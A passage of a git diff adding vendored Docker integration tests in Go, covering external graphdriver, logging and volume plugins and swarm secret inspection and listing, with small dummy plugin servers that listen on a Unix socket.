dir, err := driver.Get(req.ID, req.MountLabel) if err != nil { respond(w, err) return } - respond(w, &graphDriverResponse{Dir: dir}) + respond(w, &graphDriverResponse{Dir: dir.Path()}) }) mux.HandleFunc("/GraphDriver.Put", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].puts++ + ec[ext].puts++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -217,7 +237,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Exists", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].exists++ + ec[ext].exists++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -227,12 +247,12 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Status", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].stats++ + ec[ext].stats++ respond(w, &graphDriverResponse{Status: driver.Status()}) }) mux.HandleFunc("/GraphDriver.Cleanup", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].cleanups++ + ec[ext].cleanups++ err := driver.Cleanup() if err != nil { respond(w, err) @@ -242,7 +262,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.GetMetadata", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].metadata++ + ec[ext].metadata++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -258,7 +278,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Diff", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].diff++ + ec[ext].diff++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -274,7 +294,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Changes", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].changes++ + 
ec[ext].changes++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { return @@ -289,7 +309,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.ApplyDiff", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].applydiff++ + ec[ext].applydiff++ diff := r.Body defer r.Body.Close() @@ -309,7 +329,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.DiffSize", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].diffsize++ + ec[ext].diffsize++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -325,81 +345,118 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) err = os.MkdirAll("/etc/docker/plugins", 0755) - c.Assert(err, check.IsNil, check.Commentf("error creating /etc/docker/plugins")) + assert.NilError(t, err) specFile := "/etc/docker/plugins/" + name + "." + ext err = ioutil.WriteFile(specFile, b, 0644) - c.Assert(err, check.IsNil, check.Commentf("error writing to %s", specFile)) + assert.NilError(t, err) } -func (s *DockerExternalGraphdriverSuite) TearDownSuite(c *check.C) { - s.server.Close() - s.jserver.Close() - - err := os.RemoveAll("/etc/docker/plugins") - c.Assert(err, check.IsNil, check.Commentf("error removing /etc/docker/plugins")) +func testExternalGraphDriver(ext string, ec map[string]*graphEventsCounter) func(client.APIClient, *daemon.Daemon) func(*testing.T) { + return func(c client.APIClient, d *daemon.Daemon) func(*testing.T) { + return func(t *testing.T) { + driverName := fmt.Sprintf("%s-external-graph-driver", ext) + d.StartWithBusybox(t, "-s", driverName) + + ctx := context.Background() + + testGraphDriver(t, c, ctx, driverName, func(t *testing.T) { + d.Restart(t, "-s", driverName) + }) + + _, err := c.Info(ctx) + assert.NilError(t, err) + + d.Stop(t) + + // Don't check ec.exists, because the daemon no longer calls the + 
// Exists function. + assert.Check(t, is.Equal(ec[ext].activations, 2)) + assert.Check(t, is.Equal(ec[ext].init, 2)) + assert.Check(t, ec[ext].creations >= 1) + assert.Check(t, ec[ext].removals >= 1) + assert.Check(t, ec[ext].gets >= 1) + assert.Check(t, ec[ext].puts >= 1) + assert.Check(t, is.Equal(ec[ext].stats, 5)) + assert.Check(t, is.Equal(ec[ext].cleanups, 2)) + assert.Check(t, ec[ext].applydiff >= 1) + assert.Check(t, is.Equal(ec[ext].changes, 1)) + assert.Check(t, is.Equal(ec[ext].diffsize, 0)) + assert.Check(t, is.Equal(ec[ext].diff, 0)) + assert.Check(t, is.Equal(ec[ext].metadata, 1)) + } + } } -func (s *DockerExternalGraphdriverSuite) TestExternalGraphDriver(c *check.C) { - testRequires(c, ExperimentalDaemon) +func testGraphDriverPull(c client.APIClient, d *daemon.Daemon) func(*testing.T) { + return func(t *testing.T) { + d.Start(t) + defer d.Stop(t) + ctx := context.Background() - s.testExternalGraphDriver("test-external-graph-driver", "spec", c) - s.testExternalGraphDriver("json-external-graph-driver", "json", c) -} + r, err := c.ImagePull(ctx, "busybox:latest", types.ImagePullOptions{}) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, r) + assert.NilError(t, err) -func (s *DockerExternalGraphdriverSuite) testExternalGraphDriver(name string, ext string, c *check.C) { - if err := s.d.StartWithBusybox("-s", name); err != nil { - b, _ := ioutil.ReadFile(s.d.LogFileName()) - c.Assert(err, check.IsNil, check.Commentf("\n%s", string(b))) + container.Run(t, ctx, c, container.WithImage("busybox:latest")) } +} - out, err := s.d.Cmd("run", "--name=graphtest", "busybox", "sh", "-c", "echo hello > /hello") - c.Assert(err, check.IsNil, check.Commentf(out)) - - err = s.d.Restart("-s", name) - - out, err = s.d.Cmd("inspect", "--format={{.GraphDriver.Name}}", "graphtest") - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(strings.TrimSpace(out), check.Equals, name) - - out, err = s.d.Cmd("diff", "graphtest") - c.Assert(err, check.IsNil, 
check.Commentf(out)) - c.Assert(strings.Contains(out, "A /hello"), check.Equals, true, check.Commentf("diff output: %s", out)) - - out, err = s.d.Cmd("rm", "-f", "graphtest") - c.Assert(err, check.IsNil, check.Commentf(out)) - - out, err = s.d.Cmd("info") - c.Assert(err, check.IsNil, check.Commentf(out)) - - err = s.d.Stop() - c.Assert(err, check.IsNil) - - // Don't check s.ec.exists, because the daemon no longer calls the - // Exists function. - c.Assert(s.ec[ext].activations, check.Equals, 2) - c.Assert(s.ec[ext].init, check.Equals, 2) - c.Assert(s.ec[ext].creations >= 1, check.Equals, true) - c.Assert(s.ec[ext].removals >= 1, check.Equals, true) - c.Assert(s.ec[ext].gets >= 1, check.Equals, true) - c.Assert(s.ec[ext].puts >= 1, check.Equals, true) - c.Assert(s.ec[ext].stats, check.Equals, 5) - c.Assert(s.ec[ext].cleanups, check.Equals, 2) - c.Assert(s.ec[ext].applydiff >= 1, check.Equals, true) - c.Assert(s.ec[ext].changes, check.Equals, 1) - c.Assert(s.ec[ext].diffsize, check.Equals, 0) - c.Assert(s.ec[ext].diff, check.Equals, 0) - c.Assert(s.ec[ext].metadata, check.Equals, 1) +func TestGraphdriverPluginV2(t *testing.T) { + skip.If(t, runtime.GOOS == "windows") + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + skip.If(t, !requirement.HasHubConnectivity(t)) + skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64") + skip.If(t, !requirement.Overlay2Supported(testEnv.DaemonInfo.KernelVersion)) + + d := daemon.New(t, daemon.WithExperimental) + d.Start(t) + defer d.Stop(t) + + client := d.NewClientT(t) + defer client.Close() + ctx := context.Background() + + // install the plugin + plugin := "cpuguy83/docker-overlay2-graphdriver-plugin" + responseReader, err := client.PluginInstall(ctx, plugin, types.PluginInstallOptions{ + RemoteRef: plugin, + AcceptAllPermissions: true, + }) + defer responseReader.Close() + assert.NilError(t, err) + // ensure it's done by waiting for EOF on the response + _, err = io.Copy(ioutil.Discard, 
responseReader) + assert.NilError(t, err) + + // restart the daemon with the plugin set as the storage driver + d.Stop(t) + d.StartWithBusybox(t, "-s", plugin, "--storage-opt", "overlay2.override_kernel_check=1") + + testGraphDriver(t, client, ctx, plugin, nil) } -func (s *DockerExternalGraphdriverSuite) TestExternalGraphDriverPull(c *check.C) { - testRequires(c, Network, ExperimentalDaemon) +func testGraphDriver(t *testing.T, c client.APIClient, ctx context.Context, driverName string, afterContainerRunFn func(*testing.T)) { //nolint: golint + id := container.Run(t, ctx, c, container.WithCmd("sh", "-c", "echo hello > /hello")) - c.Assert(s.d.Start(), check.IsNil) + if afterContainerRunFn != nil { + afterContainerRunFn(t) + } + + i, err := c.ContainerInspect(ctx, id) + assert.NilError(t, err) + assert.Check(t, is.Equal(i.GraphDriver.Name, driverName)) - out, err := s.d.Cmd("pull", "busybox:latest") - c.Assert(err, check.IsNil, check.Commentf(out)) + diffs, err := c.ContainerDiff(ctx, id) + assert.NilError(t, err) + assert.Check(t, is.Contains(diffs, containertypes.ContainerChangeResponseItem{ + Kind: archive.ChangeAdd, + Path: "/hello", + }), "diffs: %v", diffs) - out, err = s.d.Cmd("run", "-d", "busybox", "top") - c.Assert(err, check.IsNil, check.Commentf(out)) + err = c.ContainerRemove(ctx, id, types.ContainerRemoveOptions{ + Force: true, + }) + assert.NilError(t, err) } diff --git a/vendor/github.com/docker/docker/integration/plugin/graphdriver/main_test.go b/vendor/github.com/docker/docker/integration/plugin/graphdriver/main_test.go new file mode 100644 index 0000000000..6b6c1a1232 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/graphdriver/main_test.go @@ -0,0 +1,36 @@ +package graphdriver // import "github.com/docker/docker/integration/plugin/graphdriver" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" + "github.com/docker/docker/pkg/reexec" +) + +var ( + testEnv *environment.Execution +) + 
+func init() { + reexec.Init() // This is required for external graphdriver tests +} + +const dockerdBinary = "dockerd" + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + testEnv.Print() + os.Exit(m.Run()) +} diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main.go new file mode 100644 index 0000000000..6891d6a995 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main.go @@ -0,0 +1,48 @@ +package main + +import ( + "encoding/json" + "fmt" + "net" + "net/http" + "os" +) + +type start struct { + File string +} + +func main() { + l, err := net.Listen("unix", "/run/docker/plugins/plugin.sock") + if err != nil { + panic(err) + } + + mux := http.NewServeMux() + mux.HandleFunc("/LogDriver.StartLogging", func(w http.ResponseWriter, req *http.Request) { + startReq := &start{} + if err := json.NewDecoder(req.Body).Decode(startReq); err != nil { + http.Error(w, err.Error(), http.StatusBadRequest) + return + } + + f, err := os.OpenFile(startReq.File, os.O_RDONLY, 0600) + if err != nil { + http.Error(w, err.Error(), http.StatusInternalServerError) + return + } + + // Close the file immediately, this allows us to test what happens in the daemon when the plugin has closed the + // file or, for example, the plugin has crashed. 
+ f.Close() + + w.WriteHeader(http.StatusOK) + fmt.Fprintln(w, `{}`) + }) + server := http.Server{ + Addr: l.Addr().String(), + Handler: mux, + } + + server.Serve(l) +} diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main_test.go new file mode 100644 index 0000000000..06ab7d0f9a --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main_test.go @@ -0,0 +1 @@ +package main diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/cmd_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/cmd_test.go new file mode 100644 index 0000000000..1d619dd05e --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/cmd_test.go @@ -0,0 +1 @@ +package cmd diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main.go new file mode 100644 index 0000000000..f91b4f3b02 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main.go @@ -0,0 +1,19 @@ +package main + +import ( + "net" + "net/http" +) + +func main() { + l, err := net.Listen("unix", "/run/docker/plugins/plugin.sock") + if err != nil { + panic(err) + } + + server := http.Server{ + Addr: l.Addr().String(), + Handler: http.NewServeMux(), + } + server.Serve(l) +} diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main_test.go new file mode 100644 index 0000000000..06ab7d0f9a --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main_test.go @@ -0,0 +1 @@ +package main diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/helpers_test.go 
b/vendor/github.com/docker/docker/integration/plugin/logging/helpers_test.go new file mode 100644 index 0000000000..dbdd36b905 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/helpers_test.go @@ -0,0 +1,67 @@ +package logging + +import ( + "context" + "os" + "os/exec" + "path/filepath" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test/fixtures/plugin" + "github.com/docker/docker/pkg/locker" + "github.com/pkg/errors" +) + +var pluginBuildLock = locker.New() + +func ensurePlugin(t *testing.T, name string) string { + pluginBuildLock.Lock(name) + defer pluginBuildLock.Unlock(name) + + installPath := filepath.Join(os.Getenv("GOPATH"), "bin", name) + if _, err := os.Stat(installPath); err == nil { + return installPath + } + + goBin, err := exec.LookPath("go") + if err != nil { + t.Fatal(err) + } + + cmd := exec.Command(goBin, "build", "-o", installPath, "./"+filepath.Join("cmd", name)) + cmd.Env = append(cmd.Env, "CGO_ENABLED=0") + if out, err := cmd.CombinedOutput(); err != nil { + t.Fatal(errors.Wrapf(err, "error building basic plugin bin: %s", string(out))) + } + + return installPath +} + +func withSockPath(name string) func(*plugin.Config) { + return func(cfg *plugin.Config) { + cfg.Interface.Socket = name + } +} + +func createPlugin(t *testing.T, client plugin.CreateClient, alias, bin string, opts ...plugin.CreateOpt) { + pluginBin := ensurePlugin(t, bin) + + opts = append(opts, withSockPath("plugin.sock")) + opts = append(opts, plugin.WithBinary(pluginBin)) + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + err := plugin.Create(ctx, client, alias, opts...) 
+ cancel() + + if err != nil { + t.Fatal(err) + } +} + +func asLogDriver(cfg *plugin.Config) { + cfg.Interface.Types = []types.PluginInterfaceType{ + {Capability: "logdriver", Prefix: "docker", Version: "1.0"}, + } +} diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/logging_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/logging_test.go new file mode 100644 index 0000000000..3921fa6e69 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/logging_test.go @@ -0,0 +1,79 @@ +package logging + +import ( + "bufio" + "context" + "os" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + "gotest.tools/skip" +) + +func TestContinueAfterPluginCrash(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon(), "test requires daemon on the same host") + t.Parallel() + + d := daemon.New(t) + d.StartWithBusybox(t, "--iptables=false", "--init") + defer d.Stop(t) + + client := d.NewClientT(t) + createPlugin(t, client, "test", "close_on_start", asLogDriver) + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + assert.Assert(t, client.PluginEnable(ctx, "test", types.PluginEnableOptions{Timeout: 30})) + cancel() + defer client.PluginRemove(context.Background(), "test", types.PluginRemoveOptions{Force: true}) + + ctx, cancel = context.WithTimeout(context.Background(), 60*time.Second) + + id := container.Run(t, ctx, client, + container.WithAutoRemove, + container.WithLogDriver("test"), + container.WithCmd( + "/bin/sh", "-c", "while true; do sleep 1; echo hello; done", + ), + ) + cancel() + defer client.ContainerRemove(context.Background(), id, types.ContainerRemoveOptions{Force: true}) + + // Attach to the container to make sure it's written a few times to stdout + attach, err := client.ContainerAttach(context.Background(), id, 
types.ContainerAttachOptions{Stream: true, Stdout: true}) + assert.Assert(t, err) + + chErr := make(chan error) + go func() { + defer close(chErr) + rdr := bufio.NewReader(attach.Reader) + for i := 0; i < 5; i++ { + _, _, err := rdr.ReadLine() + if err != nil { + chErr <- err + return + } + } + }() + + select { + case err := <-chErr: + assert.Assert(t, err) + case <-time.After(60 * time.Second): + t.Fatal("timeout waiting for container i/o") + } + + // check daemon logs for "broken pipe" + // TODO(@cpuguy83): This is horribly hacky but is the only way to really test this case right now. + // It would be nice if there was a way to know that a broken pipe has occurred without looking through the logs. + log, err := os.Open(d.LogFileName()) + assert.Assert(t, err) + scanner := bufio.NewScanner(log) + for scanner.Scan() { + assert.Assert(t, !strings.Contains(scanner.Text(), "broken pipe")) + } +} diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/main_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/main_test.go new file mode 100644 index 0000000000..e1292a5718 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/main_test.go @@ -0,0 +1,29 @@ +package logging // import "github.com/docker/docker/integration/plugin/logging" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var ( + testEnv *environment.Execution +) + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + testEnv.Print() + os.Exit(m.Run()) +} diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/validation_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/validation_test.go new file mode 100644 index 0000000000..0d9b15efbf --- /dev/null +++ 
b/vendor/github.com/docker/docker/integration/plugin/logging/validation_test.go @@ -0,0 +1,35 @@ +package logging + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + "gotest.tools/skip" +) + +// Regression test for #35553 +// Ensure that a daemon with a log plugin set as the default logger for containers +// does not keep the daemon from starting. +func TestDaemonStartWithLogOpt(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + t.Parallel() + + d := daemon.New(t) + d.Start(t, "--iptables=false") + defer d.Stop(t) + + client, err := d.NewClient() + assert.Check(t, err) + ctx := context.Background() + + createPlugin(t, client, "test", "dummy", asLogDriver) + err = client.PluginEnable(ctx, "test", types.PluginEnableOptions{Timeout: 30}) + assert.Check(t, err) + defer client.PluginRemove(ctx, "test", types.PluginRemoveOptions{Force: true}) + + d.Stop(t) + d.Start(t, "--iptables=false", "--log-driver=test", "--log-opt=foo=bar") +} diff --git a/vendor/github.com/docker/docker/integration/plugin/pkg_test.go b/vendor/github.com/docker/docker/integration/plugin/pkg_test.go new file mode 100644 index 0000000000..b56d3e2bae --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/pkg_test.go @@ -0,0 +1 @@ +package plugin // import "github.com/docker/docker/integration/plugin" diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/cmd_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/cmd_test.go new file mode 100644 index 0000000000..1d619dd05e --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/cmd_test.go @@ -0,0 +1 @@ +package cmd diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main.go b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main.go new file mode 100644 index 
0000000000..f91b4f3b02 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main.go @@ -0,0 +1,19 @@ +package main + +import ( + "net" + "net/http" +) + +func main() { + l, err := net.Listen("unix", "/run/docker/plugins/plugin.sock") + if err != nil { + panic(err) + } + + server := http.Server{ + Addr: l.Addr().String(), + Handler: http.NewServeMux(), + } + server.Serve(l) +} diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main_test.go new file mode 100644 index 0000000000..06ab7d0f9a --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main_test.go @@ -0,0 +1 @@ +package main diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/helpers_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/helpers_test.go new file mode 100644 index 0000000000..36aafd59c2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/volumes/helpers_test.go @@ -0,0 +1,73 @@ +package volumes + +import ( + "context" + "os" + "os/exec" + "path/filepath" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test/fixtures/plugin" + "github.com/docker/docker/pkg/locker" + "github.com/pkg/errors" +) + +var pluginBuildLock = locker.New() + +// ensurePlugin makes the that a plugin binary has been installed on the system. +// Plugins that have not been installed are built from `cmd/`. 
+func ensurePlugin(t *testing.T, name string) string { + pluginBuildLock.Lock(name) + defer pluginBuildLock.Unlock(name) + + goPath := os.Getenv("GOPATH") + if goPath == "" { + goPath = "/go" + } + installPath := filepath.Join(goPath, "bin", name) + if _, err := os.Stat(installPath); err == nil { + return installPath + } + + goBin, err := exec.LookPath("go") + if err != nil { + t.Fatal(err) + } + + cmd := exec.Command(goBin, "build", "-o", installPath, "./"+filepath.Join("cmd", name)) + cmd.Env = append(cmd.Env, "CGO_ENABLED=0") + if out, err := cmd.CombinedOutput(); err != nil { + t.Fatal(errors.Wrapf(err, "error building basic plugin bin: %s", string(out))) + } + + return installPath +} + +func withSockPath(name string) func(*plugin.Config) { + return func(cfg *plugin.Config) { + cfg.Interface.Socket = name + } +} + +func createPlugin(t *testing.T, client plugin.CreateClient, alias, bin string, opts ...plugin.CreateOpt) { + pluginBin := ensurePlugin(t, bin) + + opts = append(opts, withSockPath("plugin.sock")) + opts = append(opts, plugin.WithBinary(pluginBin)) + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + err := plugin.Create(ctx, client, alias, opts...) 
+ cancel() + + if err != nil { + t.Fatal(err) + } +} + +func asVolumeDriver(cfg *plugin.Config) { + cfg.Interface.Types = []types.PluginInterfaceType{ + {Capability: "volumedriver", Prefix: "docker", Version: "1.0"}, + } +} diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/main_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/main_test.go new file mode 100644 index 0000000000..5a5678d9c4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/volumes/main_test.go @@ -0,0 +1,32 @@ +package volumes // import "github.com/docker/docker/integration/plugin/volumes" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var ( + testEnv *environment.Execution +) + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + if testEnv.OSType != "linux" { + os.Exit(0) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + testEnv.Print() + os.Exit(m.Run()) +} diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/mounts_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/mounts_test.go new file mode 100644 index 0000000000..4b422ee5c3 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/volumes/mounts_test.go @@ -0,0 +1,58 @@ +package volumes + +import ( + "context" + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test/daemon" + "github.com/docker/docker/internal/test/fixtures/plugin" + "gotest.tools/assert" + "gotest.tools/skip" +) + +// TestPluginWithDevMounts tests very specific regression caused by mounts ordering +// (sorted in the daemon). 
See #36698 +func TestPluginWithDevMounts(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + t.Parallel() + + d := daemon.New(t) + d.Start(t, "--iptables=false") + defer d.Stop(t) + + client, err := d.NewClient() + assert.Assert(t, err) + ctx := context.Background() + + testDir, err := ioutil.TempDir("", "test-dir") + assert.Assert(t, err) + defer os.RemoveAll(testDir) + + createPlugin(t, client, "test", "dummy", asVolumeDriver, func(c *plugin.Config) { + root := "/" + dev := "/dev" + mounts := []types.PluginMount{ + {Type: "bind", Source: &root, Destination: "/host", Options: []string{"rbind"}}, + {Type: "bind", Source: &dev, Destination: "/dev", Options: []string{"rbind"}}, + {Type: "bind", Source: &testDir, Destination: "/etc/foo", Options: []string{"rbind"}}, + } + c.PluginConfig.Mounts = append(c.PluginConfig.Mounts, mounts...) + c.PropagatedMount = "/propagated" + c.Network = types.PluginConfigNetwork{Type: "host"} + c.IpcHost = true + }) + + err = client.PluginEnable(ctx, "test", types.PluginEnableOptions{Timeout: 30}) + assert.Assert(t, err) + defer func() { + err := client.PluginRemove(ctx, "test", types.PluginRemoveOptions{Force: true}) + assert.Check(t, err) + }() + + p, _, err := client.PluginInspectWithRaw(ctx, "test") + assert.Assert(t, err) + assert.Assert(t, p.Enabled) +} diff --git a/vendor/github.com/docker/docker/integration/secret/main_test.go b/vendor/github.com/docker/docker/integration/secret/main_test.go new file mode 100644 index 0000000000..abd4eef9f0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/secret/main_test.go @@ -0,0 +1,33 @@ +package secret // import "github.com/docker/docker/integration/secret" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err 
= environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/secret/secret_test.go b/vendor/github.com/docker/docker/integration/secret/secret_test.go new file mode 100644 index 0000000000..ecc3108f65 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/secret/secret_test.go @@ -0,0 +1,366 @@ +package secret // import "github.com/docker/docker/integration/secret" + +import ( + "bytes" + "context" + "sort" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/swarm" + "github.com/docker/docker/pkg/stdcopy" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestSecretInspect(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + + testName := "test_secret_" + t.Name() + secretID := createSecret(ctx, t, client, testName, []byte("TESTINGDATA"), nil) + + secret, _, err := client.SecretInspectWithRaw(context.Background(), secretID) + assert.NilError(t, err) + assert.Check(t, is.Equal(secret.Spec.Name, testName)) + + secret, _, err = client.SecretInspectWithRaw(context.Background(), testName) + assert.NilError(t, err) + assert.Check(t, is.Equal(secretID, secretID)) +} + +func TestSecretList(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + ctx := 
context.Background() + + testName0 := "test0_" + t.Name() + testName1 := "test1_" + t.Name() + testNames := []string{testName0, testName1} + sort.Strings(testNames) + + // create secret test0 + createSecret(ctx, t, client, testName0, []byte("TESTINGDATA0"), map[string]string{"type": "test"}) + + // create secret test1 + secret1ID := createSecret(ctx, t, client, testName1, []byte("TESTINGDATA1"), map[string]string{"type": "production"}) + + names := func(entries []swarmtypes.Secret) []string { + var values []string + for _, entry := range entries { + values = append(values, entry.Spec.Name) + } + sort.Strings(values) + return values + } + + // test by `secret ls` + entries, err := client.SecretList(ctx, types.SecretListOptions{}) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(names(entries), testNames)) + + testCases := []struct { + filters filters.Args + expected []string + }{ + // test filter by name `secret ls --filter name=xxx` + { + filters: filters.NewArgs(filters.Arg("name", testName0)), + expected: []string{testName0}, + }, + // test filter by id `secret ls --filter id=xxx` + { + filters: filters.NewArgs(filters.Arg("id", secret1ID)), + expected: []string{testName1}, + }, + // test filter by label `secret ls --filter label=xxx` + { + filters: filters.NewArgs(filters.Arg("label", "type")), + expected: testNames, + }, + { + filters: filters.NewArgs(filters.Arg("label", "type=test")), + expected: []string{testName0}, + }, + { + filters: filters.NewArgs(filters.Arg("label", "type=production")), + expected: []string{testName1}, + }, + } + for _, tc := range testCases { + entries, err = client.SecretList(ctx, types.SecretListOptions{ + Filters: tc.filters, + }) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(names(entries), tc.expected)) + + } +} + +func createSecret(ctx context.Context, t *testing.T, client client.APIClient, name string, data []byte, labels map[string]string) string { + secret, err := client.SecretCreate(ctx, 
